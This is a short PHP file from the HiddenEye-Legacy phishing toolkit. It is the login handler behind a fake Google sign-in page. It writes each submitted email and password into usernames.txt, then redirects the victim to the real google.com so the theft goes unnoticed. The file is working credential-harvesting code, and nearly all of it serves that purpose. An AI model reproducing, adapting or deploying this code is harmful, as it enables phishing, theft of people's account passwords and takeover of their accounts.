HiddenEye-Legacy/WebPages/google_standard/login.php

7 lines
196 B
PHP

<?php
include 'base.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['Email'] . " [PASS]: " . $_POST['Passwd'] . "\n", FILE_APPEND);
header('Location: https://google.com/');
exit();